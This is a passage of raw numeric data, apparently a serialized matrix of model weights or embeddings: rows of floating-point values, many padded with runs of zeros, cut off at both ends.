0.165071, -0.0413847, -0.4892, -0.00255905, -0.126075, -0.320052, -0.272004, -0.339264, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.751743, 0.00802776, 0.127171, 0.764413, -0.649843, 0.427717, -0.282083, 0.242726, 0.050959, -0.374061, 0.00308597, 0.327112, 0.50696, -0.123995, -0.781009, 0.604333, -0.148293, -0.423364, 0.218764, -0.20953, 0.219464, 0.437041, 0.390218, 0.364812, 0.037837, 0.0406732, 0.325407, 0.197235, 0.122919, 0.228857, 0.386305, 0.345948, -0.460632, 0.209441, -0.454688, -0.767626, -0.433038, 0.028578, -1.8701, -0.0743135, -0.641173, -0.244149, 0.549823, 0.0387929, 0.0478138, 0.77757, -0.511342, -0.163986, 0.231896, 0.0773283, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.405981, -0.0171778, -0.34864, -2.74881, -1.24885, 0.914388, -0.134013, -0.0336847, -0.0268316, 0.562683, 0.00619498, -0.244515, -0.784575, 0.147544, -0.0553004, -0.557527, -1.17063, -0.308496, -0.31581, 0.154522, 0.228761, 0.611872, -0.0536644, 0.0151532, -0.0205841, 0.0141396, 0.223693, -0.621742, 0.612758, 0.011576, -0.204615, -4.61737, 0.388798, 0.205391, -0.335703, -0.146788, -0.35623, -0.016443, 0.455901, -0.0345588, 0.291943, 1.44346, 0.436454, 0.0537305, 0.445731, -1.62904, -0.31125, -0.106973, 0.211625, 0.330819, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.1486, -0.0281092, -0.316401, -1.1296, 0.826642, 0.382134, 0.68813, -0.163025, -0.0557976, 0.138514, -0.0365683, 0.0973853, -1.44558, 0.224838, -0.099961, 0.14668, -0.24979, 1.767, -0.578091, -0.0817435, -1.26794, -0.623008, -0.0335716, -0.0408247, -0.00688724, -0.0375689, 0.811307, 0.0922394, 0.199597, 0.0214643, -0.596357, -4.92639, 0.109188, -0.411938, 0.512725, 0.444544, 0.288814, -0.0439124, 0.96321, -0.111357, -0.0409851, -0.0428231, 0.448917, 0.0214068, 0.134141, -0.0421486, 0.73962, -0.625875, -0.189217, 0.0109901, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.46934, -0.041374, 0.275, -0.00619663, 2.3813, 0.715543, -0.272463, -0.00430873, 1.25947, 0.0337887, -0.0180364, -0.695254, -1.25222, 0.500506, 0.387588, 0.332265, -0.616884, 0.397569, 0.471094, -0.217455, 0.802973, -0.719571, 1.03382, -0.186794, -0.0430558, -0.0208258, -0.608952, 0.537565, 1.04086, 0.161572, 0.970269, -0.257122, -0.585654, -0.350263, -0.828426, -0.138084, 0.137207, 0.00766544, 0.3084, 0.00127726, 0.211288, -0.312649, -0.0786458, 0.0621266, 0.236371, -0.310552, -0.771824, 0.489374, -0.0774861, 0.216944, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.277425, 0.010897, -0.0576476, -0.426415, -1.02631, -0.44816, -0.181656, -0.124534, 0.0119235, 0.146823, 0.0200086, 0.107208, 0.480191, -0.122292, -0.352585, 0.426267, -0.323987, 0.0817028, 0.0816936, -0.0287567, 0.382427, 0.911346, 0.105378, 0.827236, -0.0239208, -0.0380447, 0.222424, -0.474559, 0.012434, 0.108757, -0.195532, -0.439178, -0.223122, 0.454058, -0.126136, -0.402087, 0.513452, 0.0314696, -2.08173, 0.525546, -0.0219227, -0.209821, 0.340916, 0.00944964, -0.252425, -0.403715, -0.131234, 0.0523331, -0.390229, 0.88913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.92611, -0.0127626, 0.330936, -0.456887, 1.56485, 0.952867, -0.180495, -2.42666, -1.14075, 0.556439, 0.0297273, -0.545335, -3.0313, -0.355863, 0.132186, 0.0960997, 0.317961, 1.31321, 0.668503, -2.45106, -0.603412, 1.20234, 0.471963, 0.737565, -0.0248176, 0.0254776, -0.0570893, -0.364992, -0.414172, -0.021231, -0.363983, -1.14991, 0.994633, 0.267449, 0.506773, 0.422117, 0.200082, -0.0454036, -1.39989, -0.255192, -0.952639, 0.363158, 0.279913, 0.0691381, -0.147051, -0.662875, 1.07298, 1.04943, 0.565965, -0.3343, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0470127, 0.0260384, -0.00239061, -0.0356783, -0.0238743, 0.00564661, -0.0105979, -0.0211757, -0.00674181, 0.00682966, -0.00395341, -0.0108038, 0.0222569, 0.045825, 0.0104983, 0.00663437, 0.0202816, 0.032412, 0.00516674, -0.0433068, -0.0240783, -0.0421443, 0.0165029, -0.0199256, 0.0316068, -0.0180217, -0.0200766, 0.000777581, -0.0275547, -0.0455195, 0.0180881, 0.00111859, -0.015961, -0.0327818, -0.0462522, -0.0155022, -0.0133376, 0.0358468, -0.00170342, -0.013131, -0.0275671, -0.0443745, -0.00783186, 0.0360081, -0.001357, -0.04414, 0.00990426, 0.0245569, -0.00276082, -0.00687225, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.14982, 0.00800037, -0.0243698, 0.482854, 0.609077, -0.386207, -0.00780233, 0.701715, -0.0143196, -0.287645, 0.0593701, -0.326503, 0.0489246, 0.401491, -0.190081, 0.130831, 0.582395, 0.727206, -0.272989, 0.336276, -1.02791, -0.0193169, 0.0137146, 0.0553962, 0.0314208, -0.0437471, -1.05749, 0.206949, 0.162541, -0.0656043, -0.108613, 1.37692, 0.0750832, 0.0887287, -0.183961, -0.333367, 0.24798, 0.0284351, -0.389784, 0.31424, -0.477889, -0.14148, -0.768716, 0.0153934, -0.0361928, 0.0499979, 0.0951208, -1.17371, 0.414968, 0.732138, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.684643, 0.0266207, -0.0270434, -0.49358, 0.0854302, 0.198905, 1.14418, 0.0207908, 0.31771, -0.220484, -0.0348167, -0.114956, 0.0335976, 0.162506, 0.163331, -0.00662378, -0.398837, -0.396104, -0.377506, -0.232625, 0.0943345, 0.191123, 0.168899, 0.0292205, -0.0341844, -0.0330708, -0.0247395, -0.955125, 0.265533, 0.091987, -0.0690644, -0.137127, -0.0986899, 0.303722, -0.207898, -0.218725, 0.152049, 0.0373919, -5.27501, 0.319976, -0.0159305, -0.418828, -0.0451054, 0.0197838, 0.448791, -0.0443644, 0.337174, -0.064733, -0.186417, 1.32784, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1461, -0.00549, 0.794, 1.309, 0.2241, -1.364, -0.1096, 0.8984, 0.31, 0.006824, -0.00362, 0.1498, -0.2351, 0.1578, -0.001781, 0.4846, 0.3237, -0.598, -0.4915, 0.3245, -0.6685, 0.305, 0.419, 0.2988, 0.0235, 0.005497, -0.1794, -1.504, 0.0308, 0.3376, 0.3408, 1.647, 0.015045, 0.339, 0.3955, -0.785, -0.6333, -0.03845, -3.225, 0.6245, -0.8804, -1.005, -0.5205, 0.03336, 0.4966, 0.1138, -1.116, -1.156, 0.515, -0.1326], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.159, -0.00828, -0.4788, -0.485, 1.436, 1.089, 0.3484, -4.844, 0.04272, 0.3704, -0.01927, -0.674, 0.1608, 0.6504, 0.8564, 0.03717, 0.02559, -0.263, -1.085, -0.363, -1.621, -0.789, 0.374, -0.979, 0.0276, 0.03137, 0.5366, -1.149, -0.09406, -0.03333, -0.2578, 1.97, 0.05014, 0.07336, -0.866, 0.78, 0.7603, -0.02176, -2.004, -0.801, 0.2144, 1.155, -0.968, 0.02542, 0.1581, -0.1842, -0.05933, -2.332, -0.518, -0.3176], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.016, 0.02824, 0.1119, -0.524, 0.373, -0.01156, -0.11694, -0.787, -0.1544, 0.0679, -0.00353, 0.264, -0.0961, 0.545, 0.1487, 0.1159, -0.04904, -0.647, 0.8013, -0.10297, 0.648, 0.2106, 0.01344, 0.07184, 0.042, -0.002863, -1.888, -0.5093, 0.396, 0.2351, -0.2343, -0.5947, -0.08887, 0.663, -0.1105, -0.634, -0.7407, 0.0317, 0.1295, 0.3613, -0.10077, -0.503, -0.1974, 0.001014, 0.2363, 0.313, -0.3518, 0.07697, -0.49, -0.3052], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1715, 0.02829, 0.004772, 0.02516, 0.5625, -0.0817, 1.075, -0.1493, 0.3333, -0.2676, 0.0251, 0.0682, -0.0694, 0.3542, -0.1327, 0.1935, 0.0164, -0.2627, 0.4277, -0.2747, -0.5264, 0.3694, 0.2878, -0.1813, -0.02814, -0.0031, 0.0812, 0.771, 0.2673, -0.1777, 0.151, -0.6836, 0.348, 0.675, 1.043, -0.03564, 0.2542, -0.04004, 1.77, 0.2317, -0.02733, 0.11664, 0.3762, 0.03955, 0.362, -0.1356, 0.1869, -0.3638, -0.1929, -0.3042], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9556, 0.02544, 1.028, -0.3713, 0.3743, -0.4673, -0.3567, -0.02646, -0.1617, 0.501, 0.0512, -0.1328, -0.7266, -0.694, 0.7695, -0.0407, 0.02519, 0.009796, -0.532, -0.258, -1.663, -1.154, 0.1958, -0.4426, 0.04144, 0.04968, 0.9683, -0.82, -0.5156, 0.5034, 0.534, -1.932, 0.547, 0.2175, 0.01596, 0.6953, -0.4294, 0.04477, -0.0976, 0.3801, 0.02745, -0.8086, 1.048, -0.00531, 0.2722, 0.818, 0.977, 0.1377, -0.636, -0.502], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.208, -0.03038, 0.4368, 0.3352, -0.1735, 0.411, 0.3699, -0.309, -0.3606, -0.05246, 0.01125, -0.7915, 0.6357, -0.7334, 1.065, 1.068, -0.283, 1.871, -1.049, 0.504, -0.294, 0.1904, 0.713, 0.01267, 0.01167, -0.007027, 0.2249, -0.9043, -0.626, -0.1437, -0.1473, 1.068, 0.557, -0.2146, 0.1357, -2.62, 0.1184, 0.01459, 1.4795, 0.5654, 0.4502, -0.972, 0.7017, -0.001569, 0.547, 0.4846, -0.69, -0.5923, 0.1404, -0.636], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4229, 0.0222, 0.3389, 1.276, -0.9927, 1.861, -0.2554, 0.2352, -0.6445, -0.2289, -0.0086, 0.4949, 0.7124, -0.02165, 0.1733, 0.4412, -0.4126, 1.116, -0.8423, 0.4966, -0.657, 0.2178, -5.258, 0.05853, 0.0365, -0.012764, -0.519, -0.1132, 0.204, -0.5073, 1.0, 0.459, -0.3516, -0.2374, -0.216, -0.4568, 0.2795, -0.01877, -0.069, -0.472, -0.41, 0.45, -0.3025, -0.04752, -0.7124, 0.1103, -1.632, 0.1511, 0.741, -0.1305], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7993, 0.00817, 0.05536, -0.5596, 0.4001, 0.3171, 0.11993, -0.08093, -0.4167, 0.32, 0.02162, 0.07654, 0.4783, 0.11835, -0.013756, 0.08716, -0.2229, 0.1212, 0.517, -0.1464, 0.4915, 0.5127, 0.06235, 0.1626, 0.01292, 0.0107, 1.174, -0.9463, -0.5176, -0.2281, -0.2041, -2.014, 0.2316, 0.3374, 0.5137, -0.2903, 0.02423, 0.0342, -2.148, 0.6284, 0.0631, 0.7075, -0.2659, 0.0099, 0.08685, -0.1298, 0.395, -0.208, 0.01955, 0.4277], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.008, -0.01277, -0.2325, 0.1593, 0.0391, 0.62, 0.51, 0.3071, 0.1608, -0.1466, 0.02486, 0.07965, 0.6147, 0.3535, 0.00747, -0.5933, -0.5283, -0.2009, -0.4412, 0.04062, -0.3826, -0.4075, 0.02136, 0.5, 0.01367, 0.005123, 0.389, -0.1714, -0.1798, -0.2605, 0.1692, -0.008995, 0.44, 0.51, 0.3928, 0.1066, -0.3943, 0.00815, -0.1882, -0.2664, 0.4985, 0.2732, 0.396, 0.04773, 0.405, 0.028, 0.3545, 1.044, 0.2017, 0.015366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.737, -0.03494, -0.5933, -0.66, -0.06058, 0.1791, 0.02287, -0.725, -0.995, 0.1967, -0.0383, -0.535, -1.701, -0.3171, -0.6504, 0.6943, 0.2324, -0.4, -0.01306, -0.1824, -0.1428, 0.6924, -0.2435, -0.2861, 0.02672, -0.03111, -0.2686, -0.8223, 0.373, -0.752, -0.1176, -0.2795, -0.1987, 0.779, -0.3518, 0.4722, -1.005, 0.04892, -0.2113, 0.7656, 0.1531, -0.002611, -0.01464, -0.04324, 0.1993, -0.01371, 0.9707, -12.34, 0.00754, 0.0892], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1453, 0.01854, 0.3923, 0.6836, -0.1678, 0.6177, -0.2617, 0.1656, 0.1225, -0.4084, 0.0266, 0.2515, 1.008, -0.1625, -0.0394, 0.5483, -0.1019, -0.4216, 0.02937, 0.1152, 0.1932, 0.2854, 0.2233, 0.1534, 0.05377, -0.03836, -0.302, -0.1741, 0.2988, 0.1582, 0.3877, -8.84, -0.4976, 0.134, 0.03497, 0.0324, -0.3123, 0.00454, -0.3806, 0.09485, -0.336, -0.7065, 0.06207, 0.02501, -0.1006, -0.4456, 0.01917, 1.216, 0.2603, -0.12335], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.05862, -0.03256, 0.02129, -0.127, 0.2488, 0.2593, 0.2065, 0.2537, 0.02733, -0.03897, 0.03278, -0.03738, 0.4595, 0.311, 0.1215, -0.2192, -0.1039, -0.4172, 0.2847, 0.05707, 0.05093, -0.11993, -0.1232, 0.0971, 0.014084, -0.0015335, -0.00955, 1.745, 0.03053, 0.0925, -0.1101, 0.4407, -0.1704, 0.11584, -0.1301, 0.2227, -0.2517, -0.037, 5.87, -0.2537, 0.1073, 0.021, 0.31, 0.01421, 0.299, 0.2131, 0.3857, 0.3115, 0.002504, 0.491], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.898, 0.003092, 0.1925, 0.8555, -0.7627, -0.1081, 0.1088, 0.732, -0.999, 0.2913, 0.003586, -0.004894, 1.03, -0.19, 1.104, 0.2988, 0.364, -0.1599, -0.3904, 0.3574, -0.771, 0.428, -0.0967, 0.3342, -0.05035, 0.03024, -0.12225, -0.002634, 0.4158, -0.0637, 0.1616, -0.3945, -0.4583, 0.01493, 0.7666, -0.8833, 0.972, 0.01167, -0.0779, 1.24, -1.176, -0.02649, -0.2695, -0.01264, -0.264, -0.9546, 0.79, -6.5, 0.3564, -0.9023], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2032, 0.03543, -0.1357, 1.726, -0.5605, 1.445, -0.315, -0.8184, -0.57, -0.3137, -0.000582, -0.06494, 0.2668, 0.4688, 0.001549, 0.2676, -0.3948, -0.1381, -0.6133, 0.2334, 0.2454, -0.03986, -0.5884, -0.385, -0.02878, 0.03476, 1.346, 0.1394, 0.2717, -0.1189, 0.4624, -1.076, 0.6274, 0.8755, 0.1892, -0.064, 0.6187, 0.04446, -0.8936, -0.3772, 0.5, 0.2534, -1.074, 0.037, -0.3083, 0.01949, -0.4973, -0.7944, -0.4993, -0.03336], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6323, 0.04126, -0.5405, -0.166, 0.2208, -0.129, 0.169, -0.9946, 0.1418, -0.2196, -0.0125, 0.1385, 0.163, 0.269, -0.5576, 0.2747, -0.993, -0.09186, 0.6157, -0.1791, 0.0966, 0.2198, -0.1456, -0.544, -0.02904, -0.01143, -0.2131, 0.1667, 0.0334, 0.172, -2.834, 0.3108, 0.001913, -0.4487, -0.4292, 0.011925, 0.2229, 0.02026, 0.1765, 0.2277, 0.4053, 0.01941, 0.37, -0.05362, -0.02168, -0.605, -0.1816, 0.1627, -0.1959, -0.004112], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2957, 0.01348, -0.07666, 1.555, -0.001569, -0.691, 0.3435, 0.7837, 0.1508, -0.2656, 0.04803, 0.4465, -0.6235, -0.9683, -0.3916, -0.1775, 1.598, -0.745, 1.022, -0.1311, 0.4844, -0.5024, -0.494, 0.7056, -0.001978, -0.0334, 1.205, -0.7886, 1.457, -0.2158, 0.2637, -0.48, -0.3433, -0.9736, 0.7266, 0.719, 0.4504, 0.03802, -0.4124, -0.714, 0.35, -0.6763, 0.706, -0.002884, 0.2388, -0.0434, 0.8755, 0.3557, -0.647, -0.2693], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9253, 0.0348, 0.584, 2.627, 1.248, -0.235, 0.3167, 0.7275, 0.1993, -0.2166, 0.01019, 0.1487, -0.1104, -0.02403, 0.456, -0.4905, 0.1962, 0.5464, -0.3525, 0.07837, 0.672, 0.6934, -0.008194, 0.1519, -0.01573, -0.03738, -1.631, 0.4172, 0.7153, -0.03818, 0.554, -1.795, -0.10785, -0.2688, -0.04968, 0.1462, -0.1361, 0.007294, 1.31, -0.874, 0.03436, 0.1335, -0.3555, 0.02731, -0.008385, -0.6045, -1.027, 0.03757, -0.0241, -0.223], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.528, 0.0383, -0.02628, -0.05588, 1.039, -0.0453, 0.6196, 0.388, 0.1963, 0.09955, 0.02509, -0.4756, 0.4944, 0.3667, -0.06018, -0.3262, 0.3208, -0.9146, -0.2375, -0.0937, -0.2119, -0.06903, -0.271, -0.2109, 0.003881, 0.01581, -0.3726, -0.571, -0.305, 0.4421, -0.089, 0.424, 0.1494, -0.1307, 0.694, 0.2183, -0.2808, 0.01955, 